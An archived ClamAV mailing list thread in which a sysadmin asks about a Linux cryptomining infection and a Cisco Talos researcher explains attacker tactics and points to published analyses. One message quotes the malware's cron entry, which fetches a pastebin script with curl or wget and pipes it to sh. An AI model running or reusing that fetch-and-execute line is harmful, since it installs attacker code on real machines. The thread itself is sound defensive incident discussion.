[clamav-users] LSD Malwares

Xavier Maysonnave x.maysonnave at gmail.com
Mon Apr 29 05:08:57 UTC 2019 

Hi Andrew,
Thanks for your valuable informations.
Warmly.
Light

Pudhuveedu / Xavier

PGP Fingerprint: CAE5 CE4A EFE9 134F D991 5465 081C B6FB 2EAC 6CC9
<http://keyserver.ubuntu.com/pks/lookup?op=get&search=0x081CB6FB2EAC6CC9>


Le sam. 27 avr. 2019 à 04:06, Andrew Williams <awillia2 at sourcefire.com> a
écrit :

> Xavier,
>
> From the information you provided in your initial email, it sounds like
> the malware you encountered is described in-depth here:
>
>
> https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang
>
> That blog post provides a lot of insight into what the malware they
> analyzed did, which will hopefully provide you with a way to better
> understand what the malware may have done on your machines.  It's difficult
> to know for sure, though, since the one you encountered may have had
> differences to the one described.  Your best bet to remediate is to just
> restore the server from known-good backups, if possible.
>
> At the end of last year, we published a blog post that tracked three
> groups spreading this type of malware.  From
> https://blog.talosintelligence.com/2018/12/cryptomining-campaigns-2018.html,
> the groups tended to follow these TTPs:
> - Used Malicious shell scripts masquerading as JPEG files with the name
> "logo*.jpg" that install cron jobs and download and execute miners.
> - Used variants of the open-source miner XMRig intended for botnet mining,
> with versions dependent on the victim's architecture.
> - Scanned for and attempted to exploit recently published vulnerabilities
> in servers such as Apache Struts2, Oracle WebLogic and Drupal.
> - Used malicious scripts and malware hosted on Pastebin sites, Git
> repositories and domains with .tk TLDs.
>
> As you can tell, there's a lot of overlap between all of these, and it's
> not uncommon for one actor to take the scripts and binaries used by another
> and start using them (with slight modifications to use different C2, mine
> to a different wallet, etc.)
>
> Since there's so much overlap between tools and techniques, it's difficult
> to say for sure, but at first glance the infrastructure described in the
> Anomali blog post appears related to that of the malware described by these
> two articles as well:
>
> Nov 2018:
> https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/cryptocurrency-mining-malware-targets-linux-systems-uses-rootkit-for-stealth
> Feb 2019:
> https://blog.trendmicro.com/trendlabs-security-intelligence/linux-coin-miner-copied-scripts-from-korkerds-removes-all-other-malware-and-miners/
>
> -Andrew
>
> Andrew Williams
> Malware Research Engineer
> Cisco Talos
>
>
>
> On Thu, Apr 25, 2019 at 11:27 PM Xavier Maysonnave via clamav-users <
> clamav-users at lists.clamav.net> wrote:
>
>> Hi All,
>>
>> Thanks for your feedback.
>> I'm going to report to Cloudflare this URL.
>>
>> However keep in mind that there are other URLs who are involved in this
>> family.
>> */10 * * * * (curl -fsSL https://pastebin.com/raw/wR3ETdbi||wget -q -O-
>> https://pastebin.com/raw/wR3ETdbi)|sh
>> This one targets Jenkins, another popular OpenSource tool, not used on
>> our infrastructure though.
>>
>> I'm still very interested with the consequences of this malwares. Any
>> hints will be greatly appreciated.
>>
>> Thanks.
>>
>> Light
>>
>> Pudhuveedu / Xavier
>>
>> PGP Fingerprint: CAE5 CE4A EFE9 134F D991 5465 081C B6FB 2EAC 6CC9
>> <http://keyserver.ubuntu.com/pks/lookup?op=get&search=0x081CB6FB2EAC6CC9>
>>
>>
>> Le ven. 26 avr. 2019 à 08:03, Dave Warren via clamav-users <
>> clamav-users at lists.clamav.net> a écrit :
>>
>>> The same applies: Report it. Cloudflare will either forward the
>>> complaint for you, or block the offending URL (or both).
>>>
>>> On 2019-04-25 19:16, Dennis Peterson wrote:
>>> > That domain is hosted on a cloudflare IP block. They're become part of
>>> > the problem.
>>> >
>>> > dp
>>> >
>>> > On 4/25/19 7:52 AM, J.R. via clamav-users wrote:
>>> >> Perhaps it would also be worthwhile to report dd.heheda.tk to their
>>> >> hosting provider & domain registrar that they are hosting malware and
>>> >> get that site shut down...
>>> >>
>>>
>>> _______________________________________________
>>>
>>> clamav-users mailing list
>>> clamav-users at lists.clamav.net
>>> https://lists.clamav.net/mailman/listinfo/clamav-users
>>>
>>>
>>> Help us build a comprehensive ClamAV guide:
>>> https://github.com/vrtadmin/clamav-faq
>>>
>>> http://www.clamav.net/contact.html#ml
>>>
>>
>> _______________________________________________
>>
>> clamav-users mailing list
>> clamav-users at lists.clamav.net
>> https://lists.clamav.net/mailman/listinfo/clamav-users
>>
>>
>> Help us build a comprehensive ClamAV guide:
>> https://github.com/vrtadmin/clamav-faq
>>
>> http://www.clamav.net/contact.html#ml
>>
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <https://lists.clamav.net/pipermail/clamav-users/attachments/20190429/1323790e/attachment.htm>

More information about the clamav-users mailing list